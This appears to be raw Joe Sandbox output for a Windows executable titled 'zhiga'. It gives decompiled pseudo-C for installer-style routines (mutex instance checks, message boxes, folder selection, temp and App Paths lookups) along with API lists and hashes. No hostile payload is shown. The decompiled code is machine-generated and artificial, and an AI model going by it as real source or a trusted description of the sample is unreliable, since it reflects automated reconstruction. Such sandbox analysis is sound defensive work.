                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0xf88588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0xf89a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E00F844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E00F844B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0xf88588);
                                                                        										 *0xf89124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0xf89124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F82CD9
                                                                        • memset.MSVCRT ref: 00F82CE9
                                                                        • memset.MSVCRT ref: 00F82CF9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DBD
                                                                        • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82E0A
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                                        • API String ID: 1002816675-3407794480
                                                                        • Opcode ID: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                        • Instruction ID: 22b4253e4d21e9eb6680ff6a7cc74673e86b1f5ffc43ae79a84b2645473fc7d4
                                                                        • Opcode Fuzzy Hash: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                        • Instruction Fuzzy Hash: 07510870B443056BEBA4BB708C4ABFB3699EB45760F444029FA41D51D1DBB8EC42FB26
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00F834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0xf891d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0xf88584 = _t35;
                                                                        					E00F843D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0xf88184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "zhiga");
                                                                        					_t17 = CreateThread(0, 0, E00F84FE0, 0, 0, 0xf88798);
                                                                        					 *0xf8879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E00F844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0xf8858c);
                                                                        					_t38 =  *0xf88584; // 0x0
                                                                        					_t25 = E00F844B9(_t38, 0x4b2, 0xf81140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0xf891d8 = 1;
                                                                        						SetEvent( *0xf8858c);
                                                                        						_t39 =  *0xf8879c; // 0x0
                                                                        						E00F83680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0xf8858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0xf8879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 00F83535
                                                                        • EndDialog.USER32(?,?), ref: 00F83541
                                                                        • ResetEvent.KERNEL32 ref: 00F8355F
                                                                        • SetEvent.KERNEL32(00F81140,00000000,00000020,00000004), ref: 00F83590
                                                                        • GetDesktopWindow.USER32 ref: 00F835C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F835F1
                                                                        • SendMessageA.USER32(00000000), ref: 00F835F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F83610
                                                                        • SendMessageA.USER32(00000000), ref: 00F83617
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F83623
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00F88798), ref: 00F83637
                                                                        • EndDialog.USER32(?,00000000), ref: 00F83671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: zhiga
                                                                        • API String ID: 2406144884-3705506974
                                                                        • Opcode ID: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                        • Instruction ID: 7e12baad91acfb759934f752b89e7ee5f16aa0d595d99d976a4aff6c22161b37
                                                                        • Opcode Fuzzy Hash: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                        • Instruction Fuzzy Hash: 6431E431240209BBEB206F28EC4DFFB3A68E785F60F54451AF602952B0DB799911FF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00F84224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E00F844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0xf888c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0xf887a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0xf88598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E00F84200;
                                                                        					_v28 = 0xf888c0;
                                                                        					 *0xf8a288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0xf8a288(_t32, 0xf888c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0xf888c0 != 0) {
                                                                        							E00F81680(0xf887a0, 0x104, 0xf888c0);
                                                                        						}
                                                                        						 *0xf8a288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0xf887a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0xf888c0);
                                                                        					_t61 = 0xf888c0;
                                                                        					_t4 =  &(_t61[1]); // 0xf888c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0xf888c0; // 0x1f11181
                                                                        					_t44 = CharPrevA(0xf888c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xf888c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}





























                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00F84236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F8424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F84263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F8427A
                                                                        • GetTempPathA.KERNEL32(00000104,00F888C0,?,00000001), ref: 00F8429F
                                                                        • CharPrevA.USER32(00F888C0,01F11181,?,00000001), ref: 00F842C2
                                                                        • CharPrevA.USER32(00F888C0,00000000,?,00000001), ref: 00F842D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F84391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F843A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                        • Instruction ID: ec36900929a26ce360494d6b4fc3a72e5880a3a9b9a6894ef68a5fa7c200beba
                                                                        • Opcode Fuzzy Hash: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                        • Instruction Fuzzy Hash: BB41E374E00209AFE711BF64DC89AFE7BB5EB45394F84016AE941A7251CB749C02FB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0xf88a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0xf89a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E00F81680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E00F8681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E00F867C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E00F8681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E00F867C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}



































                                                                        0x00f8458a
                                                                        0x00f8458c
                                                                        0x00f8458f
                                                                        0x00f8458f
                                                                        0x00f84591
                                                                        0x00f84592
                                                                        0x00f8459b
                                                                        0x00f8459e
                                                                        0x00f845a3
                                                                        0x00f845a9
                                                                        0x00f845ad
                                                                        0x00000000
                                                                        0x00f845af
                                                                        0x00f845af
                                                                        0x00f845bf
                                                                        0x00f8462d
                                                                        0x00f84630
                                                                        0x00f8463d
                                                                        0x00f8464e
                                                                        0x00f8464e
                                                                        0x00f8463f
                                                                        0x00f84640
                                                                        0x00f84647
                                                                        0x00f8464c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8464c
                                                                        0x00f84666
                                                                        0x00f8466d
                                                                        0x00f8466f
                                                                        0x00f84675
                                                                        0x00f84675
                                                                        0x00f845ad
                                                                        0x00f84527
                                                                        0x00f8452e
                                                                        0x00f8453f
                                                                        0x00f8453f
                                                                        0x00f84530
                                                                        0x00f84531
                                                                        0x00f84538
                                                                        0x00f8453d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8453d
                                                                        0x00f84554
                                                                        0x00f8455a
                                                                        0x00f8455a
                                                                        0x00f8455a
                                                                        0x00f84525
                                                                        0x00f8468c

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00F8460D
                                                                        • MessageBeep.USER32(00000000), ref: 00F84630
                                                                        • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 00F84666
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F8466F
                                                                          • Part of subcall function 00F8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                          • Part of subcall function 00F8681F: GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                          • Part of subcall function 00F8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                          • Part of subcall function 00F8681F: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                          • Part of subcall function 00F8681F: RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                                        • API String ID: 3244514340-1120439489
                                                                        • Opcode ID: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                        • Instruction ID: 9940a1fe6dbcc3c7c6772c9ea612413275d77c66b0fe11ba803d35112cee2737
                                                                        • Opcode Fuzzy Hash: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                        • Instruction Fuzzy Hash: ED51F67290021AABDB21BF28CC48BFABB69EF45310F144195FD19A7241DB75ED05EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F82773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E00F81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E00F8658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E00F8658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0xf81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E00F81680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}

                                                                        APIs
                                                                        • CharUpperA.USER32(7E92E7A6,00000000,00000000,00000000), ref: 00F827A8
                                                                        • CharNextA.USER32(0000054D), ref: 00F827B5
                                                                        • CharNextA.USER32(00000000), ref: 00F827BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                        • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00F828AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F828B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F827E4
                                                                        Memory Dump Source
